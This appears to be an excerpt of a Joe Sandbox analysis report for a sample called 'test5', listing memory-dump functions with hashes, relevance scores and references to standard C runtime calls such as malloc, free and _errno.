Associated: 00000000.00000002.2901839568.0000000000947000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901861528.0000000000955000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901877599.0000000000957000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901877599.0000000000978000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901877599.000000000099F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901940005.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2902089316.0000000000AE5000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2902139384.0000000000AE6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_test5.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aee3658c5e28812838d822f03287f988490779dee3648af2e367d603d4cb303a
Instruction ID: 928607d967ba446ff5cffcbd4663a2d4d2e6b7264e8d1ac948e2b03333d9f911
Opcode Fuzzy Hash: aee3658c5e28812838d822f03287f988490779dee3648af2e367d603d4cb303a
Instruction Fuzzy Hash: 463127A2B0BE044ADD4BDB3A5460324921F6F93BE4F55C7325C3BB6AE5EB198043C200

Function 006AD520 Relevance: .1, Instructions: 85COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2901532138.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2901511629.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901665802.00000000007B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901797089.0000000000924000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901814768.0000000000927000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901839568.0000000000947000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901861528.0000000000955000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901877599.0000000000957000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901877599.0000000000978000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901877599.000000000099F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901940005.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2902089316.0000000000AE5000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2902139384.0000000000AE6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_test5.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 213c32a0ab83d8598f9454313fa0645f548b05d5a13efc8fc6a8193393e6d99e
Instruction ID: 0ebe3d5d05d0fd7726714ab3f1eed0a0ef260c76f7ebed10741ef002c11b6c70
Opcode Fuzzy Hash: 213c32a0ab83d8598f9454313fa0645f548b05d5a13efc8fc6a8193393e6d99e
Instruction Fuzzy Hash: 0C31E5B6302B844ADB94CB325654A89636BE798BC0F15A275CF0D93728EB35D8A5C300

Function 0068D760 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2901532138.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2901511629.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901665802.00000000007B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901797089.0000000000924000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901814768.0000000000927000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901839568.0000000000947000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901861528.0000000000955000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901877599.0000000000957000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901877599.0000000000978000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901877599.000000000099F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901940005.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2902089316.0000000000AE5000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2902139384.0000000000AE6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_test5.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2c682ea3af6f019532d0a85160a10ce028e55b752a8b2ad19e3b1e9eaaa35d35
Instruction ID: 9e57aff94532b5945e4a3fec0269241f1ed925c0f36e2a22b44a9108183ef217
Opcode Fuzzy Hash: 2c682ea3af6f019532d0a85160a10ce028e55b752a8b2ad19e3b1e9eaaa35d35
Instruction Fuzzy Hash: 481100E2E36F440ADA47D73A9591351821B5FD7BE0F28D322AD1B767D6EF2590D38200

Function 006F0860 Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2901532138.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2901511629.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901665802.00000000007B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901797089.0000000000924000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901814768.0000000000927000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901839568.0000000000947000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901861528.0000000000955000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901877599.0000000000957000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901877599.0000000000978000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901877599.000000000099F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901940005.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2902089316.0000000000AE5000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2902139384.0000000000AE6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_test5.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 125eecd908854396b6196c413c1bdaba544be5349c3974fb3726e3a3512f32fe
Instruction ID: 5c973dcf74d7d2d3dc68f0f9e22f092f9e5f3a2983a7f08b02514d816b2f89ec
Opcode Fuzzy Hash: 125eecd908854396b6196c413c1bdaba544be5349c3974fb3726e3a3512f32fe
Instruction Fuzzy Hash: 59C08CA0A06ACA19FF108306A10136029828B463C0D80808093A80021A962C86846184

Function 0000021551C14CDC Relevance: 16.6, APIs: 11, Instructions: 108COMMONLIBRARYCODE

Download Yara Rule

APIs

_errno.LIBCMT ref: 0000021551C14D0E

Part of subcall function 0000021551C0FBCC: _getptd_noexit.LIBCMT ref: 0000021551C0FBD0

__doserrno.LIBCMT ref: 0000021551C14D05

Part of subcall function 0000021551C0FB5C: _getptd_noexit.LIBCMT ref: 0000021551C0FB60

__doserrno.LIBCMT ref: 0000021551C14D6B
_errno.LIBCMT ref: 0000021551C14D72
_invalid_parameter_noinfo.LIBCMT ref: 0000021551C14DD6

Memory Dump Source

Source File: 00000000.00000002.2903693694.0000021551BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000021551BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_21551bf0000_test5.jbxd

Yara matches

Similarity

API ID: __doserrno_errno_getptd_noexit$_invalid_parameter_noinfo
String ID:
API String ID: 388111225-0
Opcode ID: f1e83107c3560ebd634bf603a2dc03616e82e6e5f746a5e0c4714b1d3544e5b9
Instruction ID: e6612d8dc5dae98f36eed9fb67337ca724564a31b7aa0cd593cf4b83bf5ef4a0
Opcode Fuzzy Hash: f1e83107c3560ebd634bf603a2dc03616e82e6e5f746a5e0c4714b1d3544e5b9
Instruction Fuzzy Hash: 8431E770188F24AFE7157F68C8DA3E93ED2EBA1320FD106D9E415872D3D775AC414A92

Function 0000021553764123 Relevance: 16.6, APIs: 11, Instructions: 108COMMONLIBRARYCODE

Download Yara Rule

APIs

_errno.LIBCMT ref: 0000021553764155

Part of subcall function 000002155375F013: _getptd_noexit.LIBCMT ref: 000002155375F017

__doserrno.LIBCMT ref: 000002155376414C

Part of subcall function 000002155375EFA3: _getptd_noexit.LIBCMT ref: 000002155375EFA7

__doserrno.LIBCMT ref: 00000215537641B2
_errno.LIBCMT ref: 00000215537641B9
_invalid_parameter_noinfo.LIBCMT ref: 000002155376421D

Memory Dump Source

Source File: 00000000.00000002.2903805802.0000021553740000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000021553740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_21553740000_test5.jbxd

Yara matches

Similarity

API ID: __doserrno_errno_getptd_noexit$_invalid_parameter_noinfo
String ID:
API String ID: 388111225-0
Opcode ID: f1e83107c3560ebd634bf603a2dc03616e82e6e5f746a5e0c4714b1d3544e5b9
Instruction ID: cfa3d22ffe842b90025ef2e65e179d7ec160ba3a2b2096d55779efb19242685a
Opcode Fuzzy Hash: f1e83107c3560ebd634bf603a2dc03616e82e6e5f746a5e0c4714b1d3544e5b9
Instruction Fuzzy Hash: 3C31FD71D28F14EFE3A96F58985A3FA36D2E7D5320F9102E8E42F871D3DA709A0142D1

Function 0000021551C15AC8 Relevance: 15.1, APIs: 10, Instructions: 93COMMONLIBRARYCODE

Download Yara Rule

APIs

_errno.LIBCMT ref: 0000021551C15AF3

Part of subcall function 0000021551C0FBCC: _getptd_noexit.LIBCMT ref: 0000021551C0FBD0

__doserrno.LIBCMT ref: 0000021551C15AEB

Part of subcall function 0000021551C0FB5C: _getptd_noexit.LIBCMT ref: 0000021551C0FB60

__lock_fhandle.LIBCMT ref: 0000021551C15B37
_lseeki64_nolock.LIBCMT ref: 0000021551C15B50
_unlock_fhandle.LIBCMT ref: 0000021551C15B73

Memory Dump Source

Source File: 00000000.00000002.2903693694.0000021551BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000021551BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_21551bf0000_test5.jbxd

Yara matches

Similarity

API ID: _getptd_noexit$__doserrno__lock_fhandle_errno_lseeki64_nolock_unlock_fhandle
String ID:
API String ID: 2644381645-0
Opcode ID: 3dd1f773b3794dac3aa2364f63410e61f96c4d43ad1712998e2299525dae883a
Instruction ID: 22e8f29c1290564db94f56ee3e16c5daea04c854aa82703843e8ff302eec6613
Opcode Fuzzy Hash: 3dd1f773b3794dac3aa2364f63410e61f96c4d43ad1712998e2299525dae883a
Instruction Fuzzy Hash: 6F217C31288E10AFF3146768D8DA3ED7EC2FBE6321F8006C9E015C31D3D7691C414A91

Function 0000021553764F0F Relevance: 15.1, APIs: 10, Instructions: 93COMMONLIBRARYCODE

Download Yara Rule

APIs

_errno.LIBCMT ref: 0000021553764F3A

Part of subcall function 000002155375F013: _getptd_noexit.LIBCMT ref: 000002155375F017

__doserrno.LIBCMT ref: 0000021553764F32

Part of subcall function 000002155375EFA3: _getptd_noexit.LIBCMT ref: 000002155375EFA7

__lock_fhandle.LIBCMT ref: 0000021553764F7E
_lseeki64_nolock.LIBCMT ref: 0000021553764F97
_unlock_fhandle.LIBCMT ref: 0000021553764FBA

Memory Dump Source

Source File: 00000000.00000002.2903805802.0000021553740000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000021553740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_21553740000_test5.jbxd

Yara matches

Similarity

API ID: _getptd_noexit$__doserrno__lock_fhandle_errno_lseeki64_nolock_unlock_fhandle
String ID:
API String ID: 2644381645-0
Opcode ID: 3dd1f773b3794dac3aa2364f63410e61f96c4d43ad1712998e2299525dae883a
Instruction ID: bb13f553f6fb686d91f3443df64bf9f86757b1b5ed3fef31e397e00da969d6a2
Opcode Fuzzy Hash: 3dd1f773b3794dac3aa2364f63410e61f96c4d43ad1712998e2299525dae883a
Instruction Fuzzy Hash: A0212B31D28E14EFF2A86B58985A3FA72C6EBE1320F8906D9E01EC71D3DB60091142A1

Function 0000021551C15950 Relevance: 15.1, APIs: 10, Instructions: 88COMMONLIBRARYCODE

Download Yara Rule

APIs

_errno.LIBCMT ref: 0000021551C1597B

Part of subcall function 0000021551C0FBCC: _getptd_noexit.LIBCMT ref: 0000021551C0FBD0

__doserrno.LIBCMT ref: 0000021551C15973

Part of subcall function 0000021551C0FB5C: _getptd_noexit.LIBCMT ref: 0000021551C0FB60

__lock_fhandle.LIBCMT ref: 0000021551C159BF
_lseek_nolock.LIBCMT ref: 0000021551C159D8
_unlock_fhandle.LIBCMT ref: 0000021551C159F9

Memory Dump Source

Source File: 00000000.00000002.2903693694.0000021551BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000021551BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_21551bf0000_test5.jbxd

Yara matches

Similarity

API ID: _getptd_noexit$__doserrno__lock_fhandle_errno_lseek_nolock_unlock_fhandle
String ID:
API String ID: 1078912150-0
Opcode ID: a44390f2c37dd677b3233f6d87f92801b3f25a181347d6d3130cc20f15b56632
Instruction ID: bfa26570e840bc3dd23ee1a45d1d3a20a03d8dcb18f5895f06d191b33390cf5d
Opcode Fuzzy Hash: a44390f2c37dd677b3233f6d87f92801b3f25a181347d6d3130cc20f15b56632
Instruction Fuzzy Hash: CB2146316C8F10AFE3046B68D8DB3FD3E82DBE3320F950689E006871D3D7A95C424A92

Function 0000021553764D97 Relevance: 15.1, APIs: 10, Instructions: 88COMMONLIBRARYCODE

Download Yara Rule

APIs

_errno.LIBCMT ref: 0000021553764DC2

Part of subcall function 000002155375F013: _getptd_noexit.LIBCMT ref: 000002155375F017

__doserrno.LIBCMT ref: 0000021553764DBA

Part of subcall function 000002155375EFA3: _getptd_noexit.LIBCMT ref: 000002155375EFA7

__lock_fhandle.LIBCMT ref: 0000021553764E06
_lseek_nolock.LIBCMT ref: 0000021553764E1F
_unlock_fhandle.LIBCMT ref: 0000021553764E40

Memory Dump Source

Source File: 00000000.00000002.2903805802.0000021553740000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000021553740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_21553740000_test5.jbxd

Yara matches

Similarity

API ID: _getptd_noexit$__doserrno__lock_fhandle_errno_lseek_nolock_unlock_fhandle
String ID:
API String ID: 1078912150-0
Opcode ID: a44390f2c37dd677b3233f6d87f92801b3f25a181347d6d3130cc20f15b56632
Instruction ID: ac4f84b3a2d9ea4d0a8100d32d42dcda2365c4065e440f4e3fa981706aeacc97
Opcode Fuzzy Hash: a44390f2c37dd677b3233f6d87f92801b3f25a181347d6d3130cc20f15b56632
Instruction Fuzzy Hash: 99212C31E28E14EFF3996B68D86A3FE3682DBD1320F5502ADE05F871D3D764591142A1

Function 0000021551C142F4 Relevance: 13.6, APIs: 9, Instructions: 89COMMONLIBRARYCODE

Download Yara Rule

APIs

_errno.LIBCMT ref: 0000021551C1431F

Part of subcall function 0000021551C0FBCC: _getptd_noexit.LIBCMT ref: 0000021551C0FBD0

__doserrno.LIBCMT ref: 0000021551C14317

Part of subcall function 0000021551C0FB5C: _getptd_noexit.LIBCMT ref: 0000021551C0FB60

__lock_fhandle.LIBCMT ref: 0000021551C14363
_unlock_fhandle.LIBCMT ref: 0000021551C1439D

Memory Dump Source

Source File: 00000000.00000002.2903693694.0000021551BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000021551BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_21551bf0000_test5.jbxd

Yara matches

Similarity

API ID: _getptd_noexit$__doserrno__lock_fhandle_errno_unlock_fhandle
String ID:
API String ID: 2464146582-0
Opcode ID: 3fa3b4e4dc5e02bebeaf5fd051b8e84fdfa837920f3ab4cfb1f7d0eadf5e2d4a
Instruction ID: 5956be054c658af700e5dd5564fad9b14702a2875334983817c402297965cd5b
Opcode Fuzzy Hash: 3fa3b4e4dc5e02bebeaf5fd051b8e84fdfa837920f3ab4cfb1f7d0eadf5e2d4a
Instruction Fuzzy Hash: A3212630688E20AFF315AB28D8DA3ED3EC2DBE5721FD106CDE019872D3D7A95C414691

Function 000002155376373B Relevance: 13.6, APIs: 9, Instructions: 89COMMONLIBRARYCODE

Download Yara Rule

APIs

_errno.LIBCMT ref: 0000021553763766

Part of subcall function 000002155375F013: _getptd_noexit.LIBCMT ref: 000002155375F017

__doserrno.LIBCMT ref: 000002155376375E

Part of subcall function 000002155375EFA3: _getptd_noexit.LIBCMT ref: 000002155375EFA7

__lock_fhandle.LIBCMT ref: 00000215537637AA
_unlock_fhandle.LIBCMT ref: 00000215537637E4

Memory Dump Source

Source File: 00000000.00000002.2903805802.0000021553740000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000021553740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_21553740000_test5.jbxd

Yara matches

Similarity

API ID: _getptd_noexit$__doserrno__lock_fhandle_errno_unlock_fhandle
String ID:
API String ID: 2464146582-0
Opcode ID: 3fa3b4e4dc5e02bebeaf5fd051b8e84fdfa837920f3ab4cfb1f7d0eadf5e2d4a
Instruction ID: 2e8c88edebbf590e2076e023f8f9c791f0d52da5c19f85e8c6837ace0ef384aa
Opcode Fuzzy Hash: 3fa3b4e4dc5e02bebeaf5fd051b8e84fdfa837920f3ab4cfb1f7d0eadf5e2d4a
Instruction Fuzzy Hash: 24212C31D28E10DFF3996758D89A3FE36C2DBD5320F9502DDE01D871E3DB64590186A5

Function 0000021551C13B18 Relevance: 13.6, APIs: 9, Instructions: 71COMMONLIBRARYCODE

Download Yara Rule

APIs

_errno.LIBCMT ref: 0000021551C13B39

Part of subcall function 0000021551C0FBCC: _getptd_noexit.LIBCMT ref: 0000021551C0FBD0

__doserrno.LIBCMT ref: 0000021551C13B31

Part of subcall function 0000021551C0FB5C: _getptd_noexit.LIBCMT ref: 0000021551C0FB60

__lock_fhandle.LIBCMT ref: 0000021551C13B7D
_close_nolock.LIBCMT ref: 0000021551C13B90
_unlock_fhandle.LIBCMT ref: 0000021551C13BA9

Memory Dump Source

Source File: 00000000.00000002.2903693694.0000021551BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000021551BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_21551bf0000_test5.jbxd

Yara matches

Similarity

API ID: _getptd_noexit$__doserrno__lock_fhandle_close_nolock_errno_unlock_fhandle
String ID:
API String ID: 2140805544-0
Opcode ID: 0567908abb1da09094319a8f35060996f58827c2446b019697f467acd15fe284
Instruction ID: b71921182186ad7c349dd022437fa83544e2bbc021855334dccc4b492d618ff4
Opcode Fuzzy Hash: 0567908abb1da09094319a8f35060996f58827c2446b019697f467acd15fe284
Instruction Fuzzy Hash: 41212931588E20EFF315AB64C8D97D97E82FBE1325F9115DCA01A875D3D67A9C404790

Function 0000021553762F5F Relevance: 13.6, APIs: 9, Instructions: 71COMMONLIBRARYCODE

Download Yara Rule

APIs

_errno.LIBCMT ref: 0000021553762F80

Part of subcall function 000002155375F013: _getptd_noexit.LIBCMT ref: 000002155375F017

__doserrno.LIBCMT ref: 0000021553762F78

Part of subcall function 000002155375EFA3: _getptd_noexit.LIBCMT ref: 000002155375EFA7

__lock_fhandle.LIBCMT ref: 0000021553762FC4
_close_nolock.LIBCMT ref: 0000021553762FD7
_unlock_fhandle.LIBCMT ref: 0000021553762FF0

Memory Dump Source

Source File: 00000000.00000002.2903805802.0000021553740000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000021553740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_21553740000_test5.jbxd

Yara matches

Similarity

API ID: _getptd_noexit$__doserrno__lock_fhandle_close_nolock_errno_unlock_fhandle
String ID:
API String ID: 2140805544-0
Opcode ID: 0567908abb1da09094319a8f35060996f58827c2446b019697f467acd15fe284
Instruction ID: 382e5a72daead621bb0e19dc3bc4c1157b60e1686003bf2b68a42a229aaf9c93
Opcode Fuzzy Hash: 0567908abb1da09094319a8f35060996f58827c2446b019697f467acd15fe284
Instruction Fuzzy Hash: 6F213E31C25E24FFF3D95B649C693DB6592DBE1310F9505ECE01E871D3DA74894083A0

Function 0000021551C0DEAC Relevance: 12.6, APIs: 10, Instructions: 116COMMONLIBRARYCODE

Download Yara Rule

APIs

free.LIBCMT ref: 0000021551C0DEDA

Part of subcall function 0000021551C0D188: RtlFreeHeap.NTDLL ref: 0000021551C0D19E
Part of subcall function 0000021551C0D188: _errno.LIBCMT ref: 0000021551C0D1A8

free.LIBCMT ref: 0000021551C0DEEF
free.LIBCMT ref: 0000021551C0DF10
free.LIBCMT ref: 0000021551C0DF25
free.LIBCMT ref: 0000021551C0DF39
free.LIBCMT ref: 0000021551C0DF45
free.LIBCMT ref: 0000021551C0DF70
free.LIBCMT ref: 0000021551C0DF91
free.LIBCMT ref: 0000021551C0DFAA
free.LIBCMT ref: 0000021551C0DFDB

Memory Dump Source

Source File: 00000000.00000002.2903693694.0000021551BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000021551BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_21551bf0000_test5.jbxd

Yara matches

Similarity

API ID: free$FreeHeap_errno
String ID:
API String ID: 2737118440-0
Opcode ID: 414a355009f71752a80ca6a1a86f772915b575b7b474327a6fec3fd0861578bf
Instruction ID: 44686d81ee51cb6f7626ef11267a90d5b6b682ba5e8b6ba0cc9871e498a2956a
Opcode Fuzzy Hash: 414a355009f71752a80ca6a1a86f772915b575b7b474327a6fec3fd0861578bf
Instruction Fuzzy Hash: 35412F3C254E1AEFFB94EBA8E8D97FC36D2E7B8315FD4406D9005C2191CA6998458F10

Function 000002155375D2F3 Relevance: 12.6, APIs: 10, Instructions: 116COMMONLIBRARYCODE

Download Yara Rule

APIs

free.LIBCMT ref: 000002155375D321

Part of subcall function 000002155375C5CF: _errno.LIBCMT ref: 000002155375C5EF

free.LIBCMT ref: 000002155375D336
free.LIBCMT ref: 000002155375D357
free.LIBCMT ref: 000002155375D36C
free.LIBCMT ref: 000002155375D380
free.LIBCMT ref: 000002155375D38C
free.LIBCMT ref: 000002155375D3B7
free.LIBCMT ref: 000002155375D3D8
free.LIBCMT ref: 000002155375D3F1
free.LIBCMT ref: 000002155375D422

Memory Dump Source

Source File: 00000000.00000002.2903805802.0000021553740000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000021553740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_21553740000_test5.jbxd

Yara matches

Similarity

API ID: free$_errno
String ID:
API String ID: 2288870239-0
Opcode ID: 414a355009f71752a80ca6a1a86f772915b575b7b474327a6fec3fd0861578bf
Instruction ID: 5c4cf818217c1b868d05c19fc3c83583ce9b60bdbd7cbda43e95ff3e331df49b
Opcode Fuzzy Hash: 414a355009f71752a80ca6a1a86f772915b575b7b474327a6fec3fd0861578bf
Instruction Fuzzy Hash: 73419231635D1ADFFBD8EB98D8987E632D2F7B8315FA04069900DC31A1DA2C8A41C761

Function 0000021551C1DC10 Relevance: 12.2, APIs: 8, Instructions: 177COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 0000021551C1DC36
_errno.LIBCMT ref: 0000021551C1DC2B

Part of subcall function 0000021551C0FBCC: _getptd_noexit.LIBCMT ref: 0000021551C0FBD0

Memory Dump Source

Source File: 00000000.00000002.2903693694.0000021551BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000021551BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_21551bf0000_test5.jbxd

Yara matches

Similarity

API ID: _errno_getptd_noexit_invalid_parameter_noinfo
String ID:
API String ID: 1812809483-0
Opcode ID: 2db82fa7e3577a0467f99b3b756d91ff98ac30b20cd2bff14b3452a9952b3022
Instruction ID: 636ada9cdc8658ad08085d866152edbe2f19379cc8bc1e81fd27fcb8cb3c8f08
Opcode Fuzzy Hash: 2db82fa7e3577a0467f99b3b756d91ff98ac30b20cd2bff14b3452a9952b3022
Instruction Fuzzy Hash: 995156340D4E3ADBEB64BB18C4DD3F93BD2EBB4321FD406EAA055C31D5D66688818692

Function 0000021551BF460C Relevance: 11.6, APIs: 9, Instructions: 305COMMONLIBRARYCODE

Download Yara Rule

APIs

malloc.LIBCMT ref: 0000021551BF46A9

Part of subcall function 0000021551C0D1C8: _FF_MSGBANNER.LIBCMT ref: 0000021551C0D1F8
Part of subcall function 0000021551C0D1C8: _NMSG_WRITE.LIBCMT ref: 0000021551C0D202
Part of subcall function 0000021551C0D1C8: _callnewh.LIBCMT ref: 0000021551C0D236
Part of subcall function 0000021551C0D1C8: _errno.LIBCMT ref: 0000021551C0D241
Part of subcall function 0000021551C0D1C8: _errno.LIBCMT ref: 0000021551C0D24C

malloc.LIBCMT ref: 0000021551BF46B3

Part of subcall function 0000021551C0D1C8: _callnewh.LIBCMT ref: 0000021551C0D25C
Part of subcall function 0000021551C0D1C8: _errno.LIBCMT ref: 0000021551C0D261

malloc.LIBCMT ref: 0000021551BF46BE
free.LIBCMT ref: 0000021551BF487E
free.LIBCMT ref: 0000021551BF4886
free.LIBCMT ref: 0000021551BF488E

Part of subcall function 0000021551BF54F0: malloc.LIBCMT ref: 0000021551BF553A
Part of subcall function 0000021551BF54F0: malloc.LIBCMT ref: 0000021551BF5545
Part of subcall function 0000021551BF54F0: free.LIBCMT ref: 0000021551BF562C
Part of subcall function 0000021551BF54F0: free.LIBCMT ref: 0000021551BF5634

free.LIBCMT ref: 0000021551BF489A
free.LIBCMT ref: 0000021551BF48A7
free.LIBCMT ref: 0000021551BF48B4

Memory Dump Source

Source File: 00000000.00000002.2903693694.0000021551BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000021551BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_21551bf0000_test5.jbxd

Yara matches

Similarity

API ID: free$malloc$_errno$_callnewh
String ID:
API String ID: 4160633307-0
Opcode ID: 793386e24770309d8645233254a04ddae00760abb9c1b1c367d4536306e412bf
Instruction ID: 4f3f192bc35051a739f7208a5f4e67e7a7616632f3a37049bd3d7760ab85bb67
Opcode Fuzzy Hash: 793386e24770309d8645233254a04ddae00760abb9c1b1c367d4536306e412bf
Instruction Fuzzy Hash: BA91DA34318F599BE759AA6C94957FD7BD2EBE5710F90029ED48AC3283DE20DC028687

Function 0000021553743A53 Relevance: 11.6, APIs: 9, Instructions: 305COMMON

Download Yara Rule

APIs

malloc.LIBCMT ref: 0000021553743AF0

Part of subcall function 000002155375C60F: _FF_MSGBANNER.LIBCMT ref: 000002155375C63F
Part of subcall function 000002155375C60F: _NMSG_WRITE.LIBCMT ref: 000002155375C649
Part of subcall function 000002155375C60F: _callnewh.LIBCMT ref: 000002155375C67D
Part of subcall function 000002155375C60F: _errno.LIBCMT ref: 000002155375C688
Part of subcall function 000002155375C60F: _errno.LIBCMT ref: 000002155375C693

malloc.LIBCMT ref: 0000021553743AFA

Part of subcall function 000002155375C60F: _callnewh.LIBCMT ref: 000002155375C6A3
Part of subcall function 000002155375C60F: _errno.LIBCMT ref: 000002155375C6A8

malloc.LIBCMT ref: 0000021553743B05
free.LIBCMT ref: 0000021553743CC5
free.LIBCMT ref: 0000021553743CCD
free.LIBCMT ref: 0000021553743CD5

Part of subcall function 0000021553744937: malloc.LIBCMT ref: 0000021553744981
Part of subcall function 0000021553744937: malloc.LIBCMT ref: 000002155374498C
Part of subcall function 0000021553744937: free.LIBCMT ref: 0000021553744A73
Part of subcall function 0000021553744937: free.LIBCMT ref: 0000021553744A7B

free.LIBCMT ref: 0000021553743CE1
free.LIBCMT ref: 0000021553743CEE
free.LIBCMT ref: 0000021553743CFB

Memory Dump Source

Source File: 00000000.00000002.2903805802.0000021553740000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000021553740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_21553740000_test5.jbxd

Yara matches

Similarity

API ID: free$malloc$_errno$_callnewh
String ID:
API String ID: 4160633307-0
Opcode ID: 793386e24770309d8645233254a04ddae00760abb9c1b1c367d4536306e412bf
Instruction ID: 476a2afb69b85e4dff711653d2705d84726f8a2f09be62e209235cf02610352e
Opcode Fuzzy Hash: 793386e24770309d8645233254a04ddae00760abb9c1b1c367d4536306e412bf
Instruction Fuzzy Hash: 6691FB30728F199BEB98AA5C94457FA73D2F7E4704F90429DD48EC72C3DE20ED128686

Function 0000021551C0DD50 Relevance: 10.6, APIs: 7, Instructions: 107COMMONLIBRARYCODE

Download Yara Rule

APIs

_errno.LIBCMT ref: 0000021551C0DD76

Part of subcall function 0000021551C0FBCC: _getptd_noexit.LIBCMT ref: 0000021551C0FBD0

_invalid_parameter_noinfo.LIBCMT ref: 0000021551C0DD82
